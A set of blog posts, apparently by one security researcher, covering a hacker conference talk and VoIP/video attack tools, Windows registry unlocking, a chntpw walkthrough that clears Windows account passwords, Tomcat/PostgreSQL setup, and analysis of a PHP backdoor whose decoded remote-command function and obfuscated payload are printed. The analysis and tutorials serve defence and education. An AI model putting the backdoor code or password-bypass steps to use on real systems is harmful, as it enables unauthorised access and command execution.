FRHACK is an International IT Security conference by Hackers, for Hackers It is organized by Jerome Athias, a well known hacker from france. First edition of FRHACK was held in a small beautiful town Besancon.

As it was my first talk in an International Security Conference, I was amazed to see hackers around the world sharing their ideas and research work. I got chance to meet IT security gurus, hackers  like David Hulton ( A well known crypto guy), Vlatko Kosturjak ( OpenVAS team member), Philippe Oechslin ( Author of Rainbow Tables),Richard Stallman ( Founder of GNU project).

David Hulton, Me and Blake Cornell

And security consultants and Penetration Testers like Andres Raincho ( Author of W3af tool),jon Rose , Blake Cornell ( One of my good friends and share the good name space in VoIP Security) , Nicolas Thill ( With amazing hair and co-author of HostilWRT)

Me, Jon Rose and Andres Riancho

Conference was running in 2 tracks, it was difficult to attend all the talks. I attended some interesting talks including OpenVAS, The good, bad and ugly of crypto where david showed how easy it is to steal passwords from ASTRA VoIP phones, HostileWRT where Nicolas Thill and Philippe Langlois showed how HostileWRT can be used to turn friendly Wireless Access Point into an Autonomous, Curious, Standalone, Malicious & Really Annoying Device.

Me speaking

My talk was on Unified Communication Security with Microsoft Office Communication Server R1/R2 and was scheduled on second day of the conference. The sole purpose of the talk was to educate and create awareness about UC security around MS OCS R1/R2. At the end of the talk, I released a free source security assessment tool for MS OCS – OATv2.0 which stands for OCS Assessment Tool

OATv2.0

Previous release of OAT was result of some of our integration work and hence had some limitations on Authentication and Transportation protocol front. OAT v2.0 introduces new attack vectors against MS OCS server R1/R2 over TLS and NTLM/Kerberose Authentication protocols.

OAT v2.0 was officially presented and released in my talk at FRHACK 01 with demonstrations of attacks and usage in various penetration testing topologies. I am planning to upload OAT v2.0 along with documentation on its official website soon. As there is no tool available for assessing Microsoft OCS servers, i hope OAT will help to improve security posture of OCS deployments.

I am sharing my slides, for those who missed FRHACK.

Also See :

1. A brief commentry on FRHACK: Day One
2. A brief commentry on FRHACK: Day two

VideoJak rocked Defcon 17 with some thrilling video attack demonstrations which we have seen only in Bond movies.

My earlier post talked about the old version of VideoJak which was used to demonstrate proof of concept (PoC) Video DoS attack against Cisco 7985 IP video phones.

VideoJak is updated with two brand new attacks.

1. Video Replay, where same video stream is repeatedly played on the target video phone of  Cisco Surveillance  camera.
2. Inserts completely random video stream in the ongoing video conversation or live feed from Surveillance  cameras.

Video Replay attack demo showed stealing of water bottle from the chair by replacing the live feed with the still video captured before the attack. While the second video attack demonstration played a short video clip from the movie “The Italian job”, thereby, replacing the live feed from surveillance camera.

We demand video solutions. Video solutions demand security

Here is the video demonstration of both of the above attacks.

• Have you ever downloaded random software from the internet and realized your Registry is locked after installing them?
• Have you ever experienced inspite of hitting Ctrl+Alt+Del, Task Manager never showed up?
• Have you ever tried to change the folder properties and found Folder options are locked?

If answer to any of above questions is ‘Yes’, then you are probably infected by some Virus/Spyware/Bot. Disabling Registry Editing Tools, Task Managers and Folder Options are the preliminary things usually done by such viruses or Spywares. This post will show you two manual methods of unlocking your Registry Editor, Task Manager and Folder Options.

I) Using Group Policy Editor

Group policy editor is a feature of Microsoft NT Family for centralized management of Computers, Users and Softwares. It can be launched by typing “gpedit.msc” in Run textbox.

Unlock Registry:

1. Open Group Policy Editor
2. Navigate to User Configuration->Administrative Template->System
3. Double Click on “Prevent access to registry editing tools” and Click Disable.

Unlock TaskManager:

1. Open Group Policy Editor
2. Navigate to User Configuration->Administrative Template->System->Ctrl+Alt+Delete Options
3. Double Click on “Remove task manager” and Click Disable.

Folder Options:

1. Open Group Policy Editor
2. Navigate to User Configuration->Administrative Templates->Windows Component->Windows Explorer
3. Double Click on “Removes the Folder Options menu item from the Tools menu“  and Click Disable.

Above mentioned steps are the easy way to achieve the task. Now let’s see what goes under the hood when you Disable some policy from Group Policy Editor.

II) Using reg.exe

Reg.exe is the Console Registry Tool provided for trouble shooting registry issues. Just open command prompt and type “reg” to list all supported options.

Unlock Registry:

1. Navigate to Start->Run and Type following command

2. REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0

3. This will prompt a console windows asking “Value DisableRegistryTools exists, overwrite(Y/N)?“
4. Say “Y” to overwrite current value in the registry key.
5. Repeat steps 1-3-4 for following command.

6. REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0

Unlock Task Manager:

1. Navigate to Start->Run and Type following command

2. REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0

3. This will prompt a console windows asking “Value DisableTaskMgr exists, overwrite(Y/N)?“
4. Say “Y” to overwrite current value in the registry key.
5. Repeat steps 2-3 for following command.

6. REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0

Folder Options:

1. Navigate to Start->Run and Type following command

2. REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NofolderOptions /t REG_DWORD /d 0

3. This will prompt a console windows asking “Value NoFolderOptions exists, overwrite(Y/N)?“
4. Say “Y” to overwrite current value in the registry key.
5. Repeat steps 2-3 for following command.

6. REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NofolderOptions /t REG_DWORD /d 0

Don’t forget to reboot the system after making above changes in registry.

Now you can have same access to your Registry, Task Manager and Folder options. From now onwards be careful before downloading and Installing random softwares from internet.

Enjoy and Stay Safe!!!

If your answer for any of the above question is ‘yes’ then this is the right place for you to get help. In this post i will explain simple way to reset password of any user account using a linux live CD. I will be explaining the password resetting procedure using Ubuntu live cd. Its not mandatory to use live cd, same steps can be used if you have duel boot linux partition.

Prerequisites:

• Ubuntu Live CD
• CD-ROM should be the first option in the target computers bios boot sequence.

OK  if you have met above mentioned pre-requisites, lets get started. We will be using a small NT password recover utility chntpw ( change NT password ). chntpw contains a simple registry editor which allows us to change bits and bytes.

Default ISO of Ubuntu-9.04 does not contain chntpw utility. We need to explicitly install it using either of following way.

• $ sudo apt-get install chntpw

• Manual: If repository do not find the package.

We need to manually satisfy dependencies for chntpw utility by using

Bughira# apt-get install libgcrypt11

Now download debian package of chntpw utility from here and install it using

Bughira:~# dpkg -i chntpw_0.99.5-0+nmu1_i386.deb
Selecting previously deselected package chntpw.
(Reading database ... 129568 files and directories currently installed.)
Unpacking chntpw (from .../chntpw_0.99.5-0+nmu1_i386.deb) ...
Setting up chntpw (0.99.5-0+nmu1) ...
Processing triggers for man-db ...
Bughira:~#

Resetting the password:

• Mount the windows partition
• Change the current directory to WINDOWS\system32\config

• Bughira# chntpw -l SAM  (this will list all the configured users on the target system)

* SAM policy limits:
Failed logins before lockout is: 0
Minimum password length        : 0
Password history count         : 0
| RID -|---------- Username ------------| Admin? |- Lock? --|
| 03eb | admin                          | ADMIN  | dis/lock |
| 01f4 | Administrator                  | ADMIN  | dis/lock |
| 03ed | ASPNET                         |        |          |
| 01f5 | Guest                          |        | dis/lock |
| 03e8 | HelpAssistant                  |        | dis/lock |
| 03ea | SUPPORT_388945a0               |        | dis/lock |

• Bughira# chntpw -u Administrator SAM

• If we do not specify any user account then Administrator user account it selected and following menu is presented

- - - - User Edit Menu:
 1 - Clear (blank) user password
 2 - Edit (set new) user password (careful with this on XP or Vista)
 3 - Promote user (make user an administrator)
 4 - Unlock and enable user account [probably locked now]
 q - Quit editing user, back to user select

Enter ’1′ as choice to clear the password and you are done. We can even change the password or promote another user as an administrator of the system.

Select: [q] > 1
Password cleared!

Hives that have changed:
 #  Name
 0  </media/disk/WINDOWS/system32/config/SAM>
Write hive files? (y/n) [n] : y
 0  </media/disk/WINDOWS/system32/config/SAM> - OK

Now you can reboot the system and happily login in your crapy windows box

Enjoy!!

This post includes HowTo:

1. Install Apache-Tomcat 6.x.x
2. Install Postgresql
3. Make them communicate with each other.

Lets first get started with the Apache-Tomcat Installation. Before we proceed lets make sure if we have JDK installed or not.

$dpkg –-get-selections | grep sun-java

Above command should yield output similar to following

sun-java6-bin                                   install
sun-java6-jdk                                   install
sun-java6-jre                                   install

If output yields no result, you’ll need to install sun-java using following command

$ sudo apt-get install sun-java6-jdk

I ran into problems while using Tomcat versions from repositories, so here we will download the Tomcat from official Apache site.

wget http://mirror.jimbojay.com/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Extract the tarball and move it to some permanent location like /usr/local/

mv apache-tomcat-6.0.18 /usr/local/apache-tomcat-6.0.18

JAVA_HOME Variable is needed for tomcat to work properly so we need to export it.

export JAVA_HOME=/usr/lib/jvm/java-6-sun

This variable will get unset once you logoff and to set this variable permanently, you will need to edit ~/.bashrc file.
Open it in your favorite editor and put following line at the end of file.

export JAVA_HOME=/usr/lib/jvm/java-6-sun

save the file and you are done.
Once variable is set, we are now ready to start the tomcat server by executing /usr/local/apache-tomcat-6.0.18/bin/startup.sh script.

root@bughira:~# /usr/local/apache-tomcat-6.0.18/bin/startup.sh
Using CATALINA_BASE:   /usr/local/apache-tomcat-6.0.18
Using CATALINA_HOME:   /usr/local/apache-tomcat-6.0.18
Using CATALINA_TMPDIR: /usr/local/apache-tomcat-6.0.18/temp
Using JRE_HOME:       /usr/lib/jvm/java-6-sun

Lets quickly check if we can see the apache process in memory.

root@bughira:~# ps -ef | grep apache
root      3089     1 45 23:56 pts/0    00:00:01 /usr/lib/jvm/java-6-sun/bin/java -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.util.logging.config.file=/usr/local/apache-tomcat-6.0.18/conf/logging.properties -Djava.endorsed.dirs=/usr/local/apache-tomcat-6.0.18/endorsed -classpath :/usr/local/apache-tomcat-6.0.18/bin/bootstrap.jar -Dcatalina.base=/usr/local/apache-tomcat-6.0.18 -Dcatalina.home=/usr/local/apache-tomcat-6.0.18 -Djava.io.tmpdir=/usr/local/apache-tomcat-6.0.18/temp org.apache.catalina.startup.Bootstrap start
root      3100  3068  0 23:56 pts/0    00:00:00 grep apache
root@bughira:~#

yes indeed and we can confirm that apache is running on default TCP port 8080

We can also write init control script for starting/stopping or restarting tomcat. Just copy and paste following shell script and save it as tomcat-ctl.sh

 #!/bin/bash
 #
 # Tomcat-ctl to start/stop/restart apache-tomcat server.
 #
 export JAVA_HOME=/usr/lib/jvm/java-6-sun

 case $1 in
 start)
 sh /usr/local/tomcat/bin/startup.sh
 ;;
 stop)  
 sh /usr/local/tomcat/bin/shutdown.sh
 ;;
 restart)
 sh /usr/local/tomcat/bin/shutdown.sh
 sh /usr/local/tomcat/bin/startup.sh
 ;;
 esac   
 exit 0

Now lets install and configure postgresql server. Again we will be using pure postgresql server from its official website.
The latest version available at the time of writing this post was 8.3.7 so lets Download the tarball  and untar it.

$wget http://wwwmaster.postgresql.org/download/mirrors-ftp/source/v8.3.7/postgresql-8.3.7.tar.gz
$tar zxvf postgresql-8.3.7.tar
$cd postgresql-8.3.7

Decide the permanent location for the postgresql and use it in –prefix parameter of configuration script as follows.

$./configure --prefix=/usr/local/pgsql

Compile postgresql

$make

and now install it to put necessary libraries and binaries in place.

$sudo make install

It is recommended to create a separate user to own the PostgreSQL files and processes that will be installed. Typically user ‘postgres’ is created for this purpose.
By default, POSTGRESQL allows database access only to users logged into the computer running the database server.

$sudo useradd postgres
$sudo mkdir /usr/local/pgsql/data
$sudo chown postgres /usr/local/pgsql/data

Lets initialize the postgres sever

$su - postgres -c "/usr/local/pgsql/bin/initdb -D /usr/local/pgsql/data"

Once initialization if successful; we can start the server using following command.

$su - postgres -c "/usr/local/pgsql/bin/postmaster -D /usr/local/pgsql/data >logfile 2>&1 &"

Lest test our server by creating a test database and connecting to it.

$su - postgres -c "/usr/local/pgsql/bin/createdb testdb"
$su - postgres -c "/usr/local/pgsql/bin/psql testdb"
$su - postgres -c "/usr/local/pgsql/bin/psql testdb"

Above command if successful should yield following output

Welcome to psql 8.3.7, the PostgreSQL interactive terminal.
Type:  \copyright for distribution terms
 \h for help with SQL commands
 \? for help with psql commands
 \g or terminate with semicolon to execute query
 \q to quit
testdb=#

If you are able to log in successfully and get psql common prompt, we have successfully installed postgresql server.
Now its time to configure server to accept remote connections – unless you only want to access the database on the local machine. To do this, first, we need to edit the postgresql.conf file:

$ sudo vi /etc/postgresql/8.3/main/postgresql.conf

Now, to edit a couple of lines in the ‘Connections and Authentication’ section…
Change the line:

#listen_addresses = 'localhost'

to

listen_addresses = '*'

and

#password_encryption = on

to

password_encryption = on

Save the file and you are done.
We also must define who can access the server. This is all done using the pg_hba.conf file.

$ sudo vi /etc/postgresql/8.3/main/pg_hba.conf

Comment out, or delete the current contents of the file, then add this text to the bottom of the file:

# DO NOT DISABLE!
# If you change this first entry you will need to make sure that the
# database
# super user can access the database using some other method.
# Noninteractive
# access to all databases is required during automatic maintenance
# (autovacuum, daily cronjob, replication, and similar tasks).
#
# Database administrative login by UNIX sockets
local   all         postgres                          ident sameuser
# TYPE  DATABASE    USER        CIDR-ADDRESS          METHOD
# "local" is for Unix domain socket connections only
local   all         all                               md5
# IPv4 local connections:
host    all         all         127.0.0.1/32          md5
# IPv6 local connections:
host    all         all         ::1/128               md5
# For remote PC connections
host    all        all          0.0.0.0/0             md5

The last line says allow all computers to connect to all database with any username.
Above procedure and configuration will help normal users to connect and operate on our installed Postgresql server but how will tomcat connect it?
JDBC driver is needed for apache-tomcat to make connections with Postgresql server. Download the valid JDBC driver(jar file) from postgreql site and copy it under lib folder of tomcat.

In our case download and copy postgresql-8.3-604.jdbc4.jar under /usr/local/apache-tomcat-6.0.18/lib/ directory and restart the tomcat server using our script.

$ sudo cp postgresql-8.3-604.jdbc4.jar /usr/local/apache-tomcat-6.0.18/lib/
$ sudo tomcat-ctl restart

Now your tomcat-postgresql connectivity should be working. I hope you find this post useful.

So what made me sit and write today?

The answer is,  my same old friend pinged me for help in one of his old web site maintenance project.  They found the website is making suspicious outbound connections and customers are receiving some junk emails from the domain. My friend was assigned to look into the issue. He asked for my help and i decided to jump inn to get dirty…

I asked him to get me all the suspicious looking files from the hosted web server for analysis and within few minutes he sent me some php files.

PHP file was filled with totally junk characters similar to following

eval(gzinflate(base64_decode('7b37QhtH8ij8P0/RniiLFEtCYOeGDA4GHHOCjRfwZnMwRxlpRjCLpFFmRmCv1+d9vmc4L/fVpa9zkQS2c9mfnV1b05fq6u7q6urq6qrauBPv9S4fDn4KJ4Ot1a/+z5c64cv/89Vq9/H2yqPHNbvQxtbq/71X1ymNe/9XlXr+didJ/Le9kyyJJhe9n8K36ZZPKVfws17rHe///dX+yWmjO4wTUYfyh3E8PZhk4UWYbHW6bsKjrUE8m2RWtdZ6rsj9+413OvusrP0zt8L5+VaaJb0knI78QVh3+tX01rzmLaE1uh+t+Y2m175D+++XHPof92897FilYsg ( cut for brevity)

Looking at the code, I realize this routine is definitely having malicious code. This was my first experience with php based de-obfuscation. I googled it a bit and got pointer to some php code used for decoding this gzinflate() routine. I download that file and realize not having  php-cli/php-cgi installed on my office debian box.

I quickly did “apt-get install php5-cli” and started PHP installation. In the meanwhile, I decided to apply java-script de-obfuscation knowledge and some common sense on this problem

In JavaScript, we used use replace eval() with document.write() and in stead of running the code we used display decoded script using alert().

In PHP, i tried replacing eval() with echo() and guess what it worked like a charm

After running the modified encoded php file, it decoded all the code and spit it on my stdout. I redirected it in file and started analyzing…

It was again a php code containing handful functions to achieve tasks like – mass mailing, dictionary attack, port scan, sql injection etc etc.

Here is one of the decoded function

function srvshelL($command){    $name=whereistmP()."\\".uniqid('NJ');    $n=uniqid('NJ');    $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];    win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));    win32_start_service($n);    win32_stop_service($n);    win32_delete_service($n);    while(!file_exists($name))sleep(1);    $exec=file_get_contents($name);    unlink($name);    return $exec;}

I tested the output of echo() trick with the php file downloaded from internet. It was same. Here is the php code used for decoding of eval(gzinflate(base64_decode()))) code.

<?php/*Taken from http://www.php.net/manual/de/function.eval.php#59862Directions:1. Save this snippet as decrypt.php2. Save encoded PHP code in coded.txt3. Create a blank file called decoded.txt (from shell do CHMOD 0666 decoded.txt)4. Execute this script (visit decrypt.php in a web browser or do php decrypt.php in the shell)5. Open decoded.txt, the PHP should be decrypted if not post the code on http://www.ariadoss.com/forums/web-development/lamp*/

 echo "\nDECODE nested eval(gzinflate()) by DEBO Jurgen <jurgen@person.be>\n\n";

 echo "1. Reading coded.txt\n";

 $fp1 = fopen ("coded.txt", "r"); $contents = fread ($fp1, filesize ("coded.txt")); fclose($fp1);

 echo "2. Decoding\n";

 while (preg_match("/eval\(gzinflate/",$contents)) {     $contents=preg_replace("/<\?|\?>/", "", $contents);     eval(preg_replace("/eval/", "\$contents=", $contents)); } echo "3. Writing decoded.txt\n"; 

 $fp2 = fopen("decoded.txt","w"); fwrite($fp2, trim($contents)); fclose($fp2);?>

Enjoy!!

This tool is completely written in C# and released under BSD License. It has nice user friendly GUI with following features:

• Online Dictionary Attack
• Presence Stealing
• Contact List Stealing
• Single User Flood Mode
• Domain Flood Mode
• Call Walk
• Play Spam Audio
• Detailed Report Generation

A detailed description of what these features are and how they can be used can be found here.

Once Online Dictionary Attack is successful against the target user, attacker can launch different attacks on the users configured for Communication Server or on the Roaming contact of target user depending on OAT Attack mode.

According to the OAT documentation; OAT works in two different scenarios

• Internal Network Attack Mode
  • OAT sits inside the corporate network and directly connects to Front End Pool Servers and Authenticate against Active Directory simulating the internal attacker scenario.

• External Network Attack Mode
  • In this mode OAT can be launched anywhere from internet and connects to Access Edge Server for presence and IM; It is also authenticated using Active Directory and uses A/V Edge for other assessment features.

With the release of OAT, its clear that Security Researchers are gearing up for Microsoft UC Solution.

References

• OCS Assessment Tool (OAT)
• OAT Gallery

I used to ignore that notification most of the time except today. I got irritated by yellow exclamation mark on Communicator Icon in system tray and I decided to hunt down the problem.
I didnt do much on my own except following paths shown by Google. I searched for a while, went through some forums and fixed the problem(s).

This post is to summarize the working steps gathered from different forums. Following are the steps that i followed in the process.

• Open the Office Communications Server 2007 management console and Expand server running with web components service.

• From the Available Task in right pane, Expand Validation and Select and complete the Web Components Server Validation wizard.
  • If wizard failes with Connectivity error “Failure [0xC3FC200D] One or more errors were detected.” then problem is Default website on Web Component Server is not assigned with valid/no  certificate. Refer here to fix this.
  • If the Validation Wizard fails with GroupExpansion and AddressBookServer Configuration then the problem is because Windows Server 2003 SP1 includes a new security feature named loopback check functionality. Validation wizard tries to visit following URL’s but fails  due to authentication failure. However, if you visit the same URL’s from system; other than Web Component Server, it works perfectly.
    • https://[ocs_server_pool]/GroupExpansion/Int/service.asmx
    • https://[ocs_server_pool]/Abs/Int/Handler/D-0ba0-0ba2.dabs
  • Microsoft has already documented workarounds for these error. Follow the references and you are through.
• Once the problem is resolved you can search needed users contact details as shown in following screen shots.      I am now happy to see my communicator free from Yellow Exclamation mark

References:

1. Assign Certificate to Default Web Site
2. Workaround for Loopback Check

When analyzed, some following results came out.

1. Binaray is not packed or encrypted in any way.
2. Its around 100 KB in size
3. It tries to make  an outbound connection to http://stats.norton.com using UserAgent: PATCH021809DB
4. When allowed to reach internet, it tries to reach http://stats.norton.com/n/p?module=2667&product=unknown&version=-1&e=-1&f=-1&g=-1&h=-1&i=0&j=-1 which
   resolves to 67.134.208.160
5. A quick DNS and whois lookup showed above IP is registered to Swapdrive in Washington.
6. Googling about Swapdrive showed Swapdrive is part of Symantec.
7. Both VirusTotal and ThreatExpert gave PIFTS.exe clean chit.

All this lead to a big chaos and people started raising Questions like Why its connecting to stats.norton.com? Did Norton get Compromised? etc etc  Some  conclusion out of above results also came up like Norton is stealing personal information from host machines or Norton is trying to cover up some past unknown issues etc etc.   All these concluding discussions got more prominent when Norton Support Forum starts deleting all the queries about the so called culprit/fishy application. Finally on 10th March, Symantec spoke about the whole fuss. Heres what Symantec commented.

“Symantec released a diagnostic patch “PIFTS.exe” targeting Norton Internet Security and Norton Antivirus 2006 & 2007 users on March 9, 2009.
In a case of human error, the patch was released by Symantec “unsigned”, which caused the firewall user prompt for this file to access the Internet.”

Symantec also clarified the reason behind deleting all the posts about PIFTS.exe claiming they received spam from 600+ newly created users.These spam forum posts contained no text in the body of the message, simply a subject:

• O LAWD IM CHOKIN ON PIFTS PLZ HALP
• OH GOD YOU GOT CHOCOLATE IN MY PIFTS
• If you wanna be my NORTON/ you gotta deal with my P ! F T S . E X E
• IF PIFTS.EXE WAS HERE, THEN WHO WAS PHONE?
• PIFTS.EXE PIFTS.EXE PIFTS.EXE PIFTS.EXE PIFTS.EXE PIFTS.EXE PIFTS.EXE
• I LOVE MY PIFTS.EXE

Internet savvy people as usual started googling about this incident and trying to digg deeper. Some hackers took advantage of this plot and planted Malwares on web sites mentioning about the incident. Once you visit such sites, malware automatically gets downloaded on your system.
I hope Symatec has cleared the chaos  and people are now aware of the root cause. With all those happened I wonder How can Symantec QA miss this basic test case of checking signatures on all the released patches?

Lets hope Symantec human error do not miss test case of validating virus Singatures

References:

1. ThreaExpert Automated Analysis
2. Virustotal Analysis
3. Norton Support Community Response
4. Whois Query Result
5. Snip from Strings.

    d:\perforce\entiredepot\consumer_crt\patchtools\patch021809db\release\PIFTS.pdb
    http://stats.norton.com/n/p?module=2667
    SOFTWARE\Symantec\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\HbEngine
    SOFTWARE\Symantec\PIF\{96E26A03-A25A-400b-B9B4-564C9BD00F46}
    The ping url is %s
    PATCH021809DB
    Norton Internet Security
    NCOAlert.dll
    NTPAlert.dll
    NAV
    NavUI.dll
    NavProd.dll
    Norton SystemWorks
    NSWAlert.dll
    NSWCfg.dll
    PollMgr.dll
    PifEng.dll

From my previous post about automated HDD installation of BackTrack3, i got comment and emails asking for BT4 Installer support as BT4 Beta does not have installer in it yet.
My old BT3Install.tar installer does not work on BT4 due to changes made by BackTrack team .   They introduces a new shell called “Debian Almquist shell (Dash)” and /bin/sh is now a symlink to /bin/dash. It looks like “dash” shell does not support most of the semantics of legacy bash shell.  As per wikipedia – Dash is a direct descendant of the NetBSD version of the Almquist Shell (ash)

I have modified the original BT3Install install script and done some reported bug fixes in this release of BT4Install. I have tested it under my VMWare and its working fine. This install script is still not generic, i am planning to add pre-requisite checks before starting the installation wizard in near future. Currently slammed with lot of other intersting stuffs which i will talk about soon..

Following are some of the screen shots of BT4Install in action. Please feel free to let me know if you need BT4Install, i will be more than happy to email it.  I have tried not to repeat whole installation procedure in this post. However, interested people or newbies might want to  go through BT3Install post.

• Some important points to keep in mind.

Installing BackTrack needs at least 4 GB of free space on Hard drive. BT4 Beta has foot print of 856 MB without having voip packages.  It is definitely going to touch 1 GB mark in near future. So Make sure you have enough hard disk space before starting installation.

Express Install is also supported and tested. I will recommend using Express Install only when you have taken backup of important stuffs from existing OS installation and want to install BT4 by cleaning all of its traces.

Manual mode installation assumes partitions to be already created before proceeding.

Express mode install does not support installation on clean and unpartitioned hard disk. Following are some of the screenshots of Express Mode installation in action.

Enjoy BackTrack 4 and stay safe.

Reference:

1. BT3Install
2. BackTrack4 Beta:  The perfect hard disk install.